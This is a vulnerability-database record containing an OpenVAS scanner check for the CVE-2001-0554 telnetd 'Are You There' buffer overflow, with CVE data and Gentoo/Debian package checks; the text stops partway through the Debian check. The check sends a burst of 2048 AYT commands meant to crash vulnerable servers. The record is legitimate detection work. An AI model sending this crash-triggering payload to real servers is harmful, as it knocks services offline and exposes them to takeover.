ID OPENVAS:136141256231010709 Type openvas Reporter Copyright (C) 2001 Pavel Kankovsky Modified 2020-03-24T00:00:00
Description
The Telnet server does not return an expected number of replies
when it receives a long sequence of 'Are You There' commands.
# OpenVAS Vulnerability Test
# Description: TESO in.telnetd buffer overflow
#
# Authors:
# Pavel Kankovsky, DCIT s.r.o. <kan@dcit.cz>
#
# Copyright:
# Copyright (C) 2001 Pavel Kankovsky
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# The kudos for an idea of counting of AYT replies should go
# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus
# <noamr@beyondsecurity.com>.
#
# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)
# Plugin registration. The scanner runs the script once with "description"
# set to collect this metadata; the check itself (below) is skipped then.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10709");
script_version("2020-03-24T06:41:42+0000");
script_tag(name:"last_modification", value:"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_xref(name:"IAVA", value:"2001-t-0008");
script_bugtraq_id(3064);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2001-0554");
script_name("TESO in.telnetd buffer overflow");
# Destructive category: the probe may crash a vulnerable server (see the
# "summary" tag), so it belongs to the destructive test class.
script_category(ACT_DESTRUCTIVE_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("Copyright (C) 2001 Pavel Kankovsky");
script_family("Gain a shell remotely");
# NOTE(review): the note below predates the current dependency line; the
# script now declares a dependency on the telnet detection script only.
# Confirm whether ordering after ms_telnet_overflow-004.nasl still matters.
# Must run AFTER ms_telnet_overflow-004.nasl
script_dependencies("telnetserver_detect_type_nd_version.nasl");
script_require_ports("Services/telnet", 23);
script_mandatory_keys("telnet/banner/available");
script_xref(name:"URL", value:"http://www.team-teso.net/advisories/teso-advisory-011.tar.gz");
script_tag(name:"solution", value:"Comment out the 'telnet' line in /etc/inetd.conf.");
script_tag(name:"summary", value:"The Telnet server does not return an expected number of replies
when it receives a long sequence of 'Are You There' commands. This probably means it overflows one
of its internal buffers and crashes.");
script_tag(name:"impact", value:"It is likely an attacker could abuse this bug to gain
control over the remote host's superuser.");
script_tag(name:"solution_type", value:"Mitigation");
# registration done; never fall through into the check
exit(0);
}
include("telnet_func.inc");
include("misc_func.inc");
# Telnet command sequences (RFC 854 byte values): 0xff is IAC, 0xf6 is
# AYT ("Are You There") and 0xf5 is AO ("Abort Output").
iac_ayt = raw_string(0xff, 0xf6);
iac_ao = raw_string(0xff, 0xf5);
# IAC WILL <option>: 0xfb is WILL; the option bytes 0x08 and 0x26 (38) are
# the NAOL and ENCRYPT options the variable names refer to. Sent by
# attack() on the non-negotiating path instead of a full negotiation.
iac_will_naol = raw_string(0xff, 0xfb, 0x08);
iac_will_encr = raw_string(0xff, 0xfb, 0x26);
#
# This helper function counts AYT responses in the input stream.
# The input is read until 1. the expected number of responses is found,
# or 2. EOF or read timeout occurs.
#
# At this moment, any occurrence of "Yes" or "yes" is supposed to be such
# a response. Of course, this is wrong: some FreeBSD was observed to react
# with "load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k"
# when the telnet negotiation has been completed. Unfortunately, adding
# another pattern to this code would be too painful (hence the negotiation
# tricks in attack()).
#
# In order to avoid an infinite loop (when testing a host that generates
# lots of junk, intentionally or unintentionally), I stop when I have read
# more than 100 * max bytes.
#
# Please note builtin functions like ereg() or egrep() cannot be used
# here (easily) because they choke on '\0' and many telnet servers send
# this character
#
# Local variables: num, state, bytes, a, i, newstate
#
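# Count AYT replies ("yes" / "Yes") arriving on sock.
#
# sock: connected telnet socket to read from.
# max:  number of replies expected; reading stops as soon as that many
#       have been seen.
#
# Returns the number of replies seen (max at most) when either max is
# reached or the connection hits EOF / a read timeout, and -1 when more
# than 100 * max bytes were read without reaching max (inconclusive).
#
# The matcher is a three-state machine over single bytes, so NUL bytes in
# the stream are harmless. A 'y'/'Y' always restarts a match, so inputs
# such as "yyes" are counted too (the original state machine dropped
# them).
function count_ayt(sock, max) {
  local_var num, state, bytes, a, len, i, c, newstate;
  num = 0; state = 0;
  # byte budget that bounds the loop on a host that emits endless junk
  bytes = 100 * max;
  while (bytes >= 0) {
    a = recv(socket:sock, length:1024);
    # EOF or read timeout: report what has been seen so far
    if (!a) return (num);
    len = strlen(a);
    bytes = bytes - len;
    for (i = 0; i < len; i = i + 1) {
      c = a[i];
      newstate = 0;
      if ((state == 1) && (c == "e")) {
        newstate = 2;
      }
      else if ((state == 2) && (c == "s")) {
        num = num + 1;
        if (num >= max) return (num);
        newstate = 0;
      }
      else if ((c == "y") || (c == "Y")) {
        # a (new) 'y' starts a match from whatever state we were in
        newstate = 1;
      }
      state = newstate;
    }
  }
  # inconclusive result: byte budget exhausted before max replies arrived
  return (-1);
}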
#
# This function tests the vulnerability. "negotiate" indicates whether
# full telnet negotiation should be performed using telnet_init().
# Some targets might need it while others, like FreeBSD, fail to respond
# to AYT in an expected way when the negotiation is done (cf. comments
# accompanying count_ayt()).
#
# Local variables: r, total, size, bomb, succ
#
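# Run the AYT-counting check against the telnet service on port.
#
# port:      telnet port to connect to.
# negotiate: non-zero -> perform the usual telnet negotiation with
#            telnet_negotiate(); zero -> skip it and only announce the
#            NAOL and ENCRYPT options (needed for targets, like the
#            FreeBSD case described above count_ayt(), whose AYT reply
#            changes after a full negotiation).
#
# Returns 1 when the server first answers a single AYT but then answers
# fewer than "total" of a burst of "total" AYTs (a conclusive short count),
# 0 otherwise: no connection, no negotiation result, no AYT support, or an
# inconclusive read (-1 from count_ayt()).
#
# All working variables are declared local so that repeated calls (the
# caller invokes this twice) do not leak state through globals.
function attack(port, negotiate) {
  local_var succ, soc, r, total, size, bomb;
  succ = 0;
  soc = open_sock_tcp(port);
  if (!soc) return (0);
  if (negotiate) {
    # standard negotiation; r is whatever telnet_negotiate() hands back
    r = telnet_negotiate(socket:soc);
  }
  else {
    # weird BSD magic, is it necessary? Announce the two options without
    # a full negotiation round.
    send(socket:soc, data:iac_will_naol);
    send(socket:soc, data:iac_will_encr);
    r = 1;
  }
  if (r) {
    # test whether the server talks to us at all and whether AYT is supported
    send(socket:soc, data:iac_ayt);
    r = count_ayt(sock:soc, max:1);
    if (r >= 1) {
      # test whether too many AYT's make the server stop replying
      total = 2048; size = total * strlen(iac_ayt);
      bomb = iac_ao + crap(length:size, data:iac_ayt);
      send(socket:soc, data:bomb);
      r = count_ayt(sock:soc, max:total);
      # a conclusive count that is short of the expected total is the
      # vulnerable signature; -1 (inconclusive) is deliberately not one
      if ((r >= 0) && (r < total)) succ = 1;
    }
  }
  close(soc);
  return (succ);
}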
# Entry point: locate the telnet port and run the check, first without and
# then (only if that did not fire) with a full telnet negotiation.
port = telnet_get_port(default:23);
success = attack(port:port, negotiate:0);
if (!success) success = attack(port:port, negotiate:1);
# neither variant produced a conclusive short reply count
if (!success) exit(99);
security_message(port:port);
exit(0);
{"id": "OPENVAS:136141256231010709", "type": "openvas", "bulletinFamily": "scanner", "title": "TESO in.telnetd buffer overflow", "description": "The Telnet server does not return an expected number of replies\n when it receives a long sequence of ", "published": "2005-11-03T00:00:00", "modified": "2020-03-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010709", "reporter": "Copyright (C) 2001 Pavel Kankovsky", "references": ["2001-t-0008", "http://www.team-teso.net/advisories/teso-advisory-011.tar.gz"], "cvelist": ["CVE-2001-0554"], "lastseen": "2020-03-24T16:37:05", "viewCount": 53, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0554"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:6843"]}, {"type": "nessus", "idList": ["TESO_TELNET.NASL", "DEBIAN_DSA-070.NASL", "GENTOO_GLSA-200410-03.NASL", "CSCDW19195.NASL", "DEBIAN_DSA-075.NASL", "MANDRAKE_MDKSA-2001-093.NASL", "MANDRAKE_MDKSA-2001-068.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:809", "OSVDB:10531"]}, {"type": "cisco", "idList": ["CISCO-SA-20020129-CATOS-TELRCV", "CISCO-SA-20020903-VPN3K-VULNERABILITY"]}, {"type": "exploitdb", "idList": ["EDB-ID:21018"]}, {"type": "openvas", "idList": ["OPENVAS:54694", "OPENVAS:10709", "OPENVAS:53824", "OPENVAS:53820"]}, {"type": "cert", "idList": ["VU:745371"]}, {"type": "gentoo", "idList": ["GLSA-200410-03"]}], "modified": "2020-03-24T16:37:05", "rev": 2}, "score": {"value": 9.0, "vector": "NONE", "modified": "2020-03-24T16:37:05", "rev": 2}, "vulnersScore": 9.0}, "pluginID": "136141256231010709", "sourceData": "# OpenVAS Vulnerability Test\n# Description: TESO in.telnetd buffer overflow\n#\n# Authors:\n# Pavel Kankovsky, DCIT s.r.o. 
<kan@dcit.cz>\n#\n# Copyright:\n# Copyright (C) 2001 Pavel Kankovsky\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n# The kudos for an idea of counting of AYT replies should go\n# to Sebastian <scut@nb.in-berlin.de> and Noam Rathaus\n# <noamr@beyondsecurity.com>.\n#\n# rd: tested against Solaris 2.8, RH Lx 6.2, FreeBSD 4.3 (patched & unpatched)\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10709\");\n script_version(\"2020-03-24T06:41:42+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 06:41:42 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-t-0008\");\n script_bugtraq_id(3064);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0554\");\n script_name(\"TESO in.telnetd buffer overflow\");\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2001 Pavel Kankovsky\");\n script_family(\"Gain a shell remotely\");\n # Must run AFTER ms_telnet_overflow-004.nasl\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"telnet/banner/available\");\n\n 
script_xref(name:\"URL\", value:\"http://www.team-teso.net/advisories/teso-advisory-011.tar.gz\");\n\n script_tag(name:\"solution\", value:\"Comment out the 'telnet' line in /etc/inetd.conf.\");\n\n script_tag(name:\"summary\", value:\"The Telnet server does not return an expected number of replies\n when it receives a long sequence of 'Are You There' commands. This probably means it overflows one\n of its internal buffers and crashes.\");\n\n script_tag(name:\"impact\", value:\"It is likely an attacker could abuse this bug to gain\n control over the remote host's superuser.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\n\niac_ayt = raw_string(0xff, 0xf6);\niac_ao = raw_string(0xff, 0xf5);\niac_will_naol = raw_string(0xff, 0xfb, 0x08);\niac_will_encr = raw_string(0xff, 0xfb, 0x26);\n\n#\n# This helper function counts AYT responses in the input stream.\n# The input is read until 1. the expected number of responses is found,\n# or 2. EOF or read timeout occurs.\n#\n# At this moment, any occurrence of \"Yes\" or \"yes\" is supposed to be such\n# a response. Of course, this is wrong: some FreeBSD was observed to react\n# with \"load: 0.12 cmd: .log 20264 [running] 0.00u 0.00s 0% 620k\"\n# when the telnet negotiation have been completed. 
Unfortunately, adding\n# another pattern to this code would be too painful (hence the negotiation\n# tricks in attack()).\n#\n# In order to avoid an infinite loop (when testing a host that generates\n# lots of junk, intentionally or unintentionally), I stop when I have read\n# more than 100 * max bytes.\n#\n# Please note builtin functions like ereg() or egrep() cannot be used\n# here (easily) because they choke on '\\0' and many telnet servers send\n# this character\n#\n# Local variables: num, state, bytes, a, i, newstate\n#\n\nfunction count_ayt(sock, max) {\n num = 0; state = 0;\n bytes = 100 * max;\n while (bytes >= 0) {\n a = recv(socket:sock, length:1024);\n if (!a) return (num);\n bytes = bytes - strlen(a);\n for (i = 0; i < strlen(a); i = i + 1) {\n newstate = 0;\n if ((state == 0) && ((a[i] == \"y\") || (a[i] == \"Y\")))\n newstate = 1;\n if ((state == 1) && (a[i] == \"e\"))\n newstate = 2;\n if ((state == 2) && (a[i] == \"s\")) {\n # DEBUG display(\"hit \", a[i-2], a[i-1], a[i], \"\\n\");\n num = num + 1;\n if (num >= max) return (num);\n newstate = 0;\n }\n state = newstate;\n }\n }\n # inconclusive result\n return (-1);\n}\n\n#\n# This functions tests the vulnerability. \"negotiate\" indicates whether\n# full telnet negotiation should be performed using telnet_init().\n# Some targets might need it while others, like FreeBSD, fail to respond\n# to AYT in an expected way when the negotiation is done (cf. 
comments\n# accompanying count_ayt()).\n#\n# Local variables: r, total, size, bomb, succ\n#\n\nfunction attack(port, negotiate) {\n succ = 0;\n soc = open_sock_tcp(port);\n if (!soc) return (0);\n if (negotiate)\n # standard negotiation\n r = telnet_negotiate(socket:soc);\n else {\n # weird BSD magic, is is necessary?\n send(socket:soc, data:iac_will_naol);\n send(socket:soc, data:iac_will_encr);\n r = 1;\n }\n if (r) {\n # test whether the server talks to us at all\n # and whether AYT is supported\n send(socket:soc, data:iac_ayt);\n r = count_ayt(sock:soc, max:1);\n # DEBUG display(\"probe \", r, \"\\n\");\n if (r >= 1) {\n # test whether too many AYT's make the server die\n total = 2048; size = total * strlen(iac_ayt);\n bomb = iac_ao + crap(length:size, data:iac_ayt);\n send(socket:soc, data:bomb);\n r = count_ayt(sock:soc, max:total);\n # DEBUG\n#display(\"attack \", r, \" expected \", total, \"\\n\");\n if ((r >= 0) && (r < total)) succ = 1;\n }\n }\n close(soc);\n return (succ);\n}\n\nport = telnet_get_port(default:23);\nsuccess = attack(port:port, negotiate:0);\nif (!success)\n success = attack(port:port, negotiate:1);\n\nif (success) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Gain a shell remotely"}
{"cve": [{"lastseen": "2020-10-03T11:36:57", "description": "Buffer overflow in BSD-based telnetd telnet daemon on various operating systems allows remote attackers to execute arbitrary commands via a set of options including AYT (Are You There), which is not properly handled by the telrcv function.", "edition": 4, "cvss3": {}, "published": "2001-08-14T04:00:00", "title": "CVE-2001-0554", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0554"], "modified": "2020-01-21T15:47:00", "cpe": ["cpe:/o:openbsd:openbsd:2.4", "cpe:/o:netbsd:netbsd:1.5.1", "cpe:/o:freebsd:freebsd:4.1.1", "cpe:/o:netbsd:netbsd:1.2", "cpe:/o:sun:sunos:5.8", "cpe:/a:netkit:linux_netkit:0.12", "cpe:/o:sun:sunos:5.0", "cpe:/o:netbsd:netbsd:1.3.2", "cpe:/o:netbsd:netbsd:1.5", "cpe:/a:netkit:linux_netkit:0.10", "cpe:/o:openbsd:openbsd:2.6", "cpe:/o:openbsd:openbsd:2.2", "cpe:/o:ibm:aix:5.1", "cpe:/o:sun:solaris:2.6", "cpe:/o:openbsd:openbsd:2.8", "cpe:/a:mit:kerberos_5:1.2.2", "cpe:/o:freebsd:freebsd:4.3", "cpe:/o:netbsd:netbsd:1.4.1", "cpe:/o:freebsd:freebsd:3.5.1", "cpe:/o:netbsd:netbsd:1.3", "cpe:/o:ibm:aix:4.3.2", "cpe:/o:netbsd:netbsd:1.2.1", "cpe:/o:ibm:aix:4.3.1", "cpe:/o:netbsd:netbsd:1.3.1", "cpe:/o:openbsd:openbsd:2.1", "cpe:/a:mit:kerberos_5:1.1", "cpe:/o:ibm:aix:4.3", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:sun:sunos:5.2", "cpe:/o:sun:sunos:5.7", "cpe:/o:netbsd:netbsd:1.4.2", "cpe:/o:netbsd:netbsd:1.1", "cpe:/o:netbsd:netbsd:1.3.3", "cpe:/o:openbsd:openbsd:2.0", 
"cpe:/a:netkit:linux_netkit:0.11", "cpe:/a:mit:kerberos_5:1.2.1", "cpe:/o:netbsd:netbsd:1.0", "cpe:/o:sun:sunos:5.4", "cpe:/o:sun:sunos:5.5", "cpe:/o:openbsd:openbsd:2.3", "cpe:/a:mit:kerberos_5:1.1.1", "cpe:/o:sgi:irix:6.5", "cpe:/o:openbsd:openbsd:2.7", "cpe:/a:mit:kerberos_5:1.2", "cpe:/o:ibm:aix:4.3.3", "cpe:/o:openbsd:openbsd:2.5", "cpe:/o:sun:sunos:5.1", "cpe:/o:netbsd:netbsd:1.4", "cpe:/o:sun:sunos:5.3", "cpe:/o:freebsd:freebsd:4.2", "cpe:/a:mit:kerberos:1.0", "cpe:/o:netbsd:netbsd:1.4.3"], "id": "CVE-2001-0554", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0554", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:openbsd:openbsd:2.4:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.5:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:netkit:linux_netkit:0.12:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.8:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:netkit:linux_netkit:0.11:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.3:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.1:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.7:*:*:*:*:*:*:*", 
"cpe:2.3:o:netbsd:netbsd:1.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.2:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:sgi:irix:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.1:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.5:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:mit:kerberos_5:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3:*:*:*:*:*:*:*", "cpe:2.3:o:openbsd:openbsd:2.3:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:ibm:aix:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:netkit:linux_netkit:0.10:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:50:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200410-03.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54694", "href": "http://plugins.openvas.org/nasl.php?oid=54694", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200410-03 (netkit-telnetd)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Buffer overflows exist in the telnet client and daemon provided by\nnetkit-telnetd, which could possibly allow a remote attacker to gain root\nprivileges and compromise the system.\";\ntag_solution = \"All NetKit-telnetd users should upgrade to the latest version:\n\n # emerge sync\n\n # emerge -pv '>=net-misc/netkit-telnetd-0.17-r4'\n # emerge '>=net-misc/netkit-telnetd-0.17-r4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200410-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=64632\nhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=264846\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200410-03.\";\n\n \n\nif(description)\n{\n script_id(54694);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(3064);\n script_cve_id(\"CVE-2001-0554\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_name(\"Gentoo Security Advisory GLSA 200410-03 (netkit-telnetd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/netkit-telnetd\", unaffected: make_list(\"ge 0.17-r4\"), vulnerable: make_list(\"le 0.17-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "description": "The remote host is missing an update to netkit-telnet-ssl\nannounced via advisory DSA 075-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53824", "href": "http://plugins.openvas.org/nasl.php?oid=53824", "type": "openvas", "title": "Debian Security Advisory DSA 075-1 (netkit-telnet-ssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_075_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 075-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The telnet daemon contained in the netkit-telnet-ssl_0.16.3-1 package in\nthe 'stable' (potato) distribution of Debian GNU/Linux is vulnerable to an\nexploitable overflow in its output handling.\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. 
At that time, netkit-telnet versions after 0.14 were\nnot believed to be vulnerable.\nOn Aug 10 2001, zen-parse posted an advisory based on the same problem, for\nall netkit-telnet versions below 0.17.\nMore details can be found on http://www.securityfocus.com/archive/1/203000 .\nAs Debian uses the 'telnetd' user to run in.telnetd, this is not a remote\nroot compromise on Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet-ssl packages to the versions\nlisted below.\";\ntag_summary = \"The remote host is missing an update to netkit-telnet-ssl\nannounced via advisory DSA 075-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20075-1\";\n\nif(description)\n{\n script_id(53824);\n script_cve_id(\"CVE-2001-0554\");\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 14:24:38 +0100 (Thu, 17 Jan 2008)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 075-1 (netkit-telnet-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. 
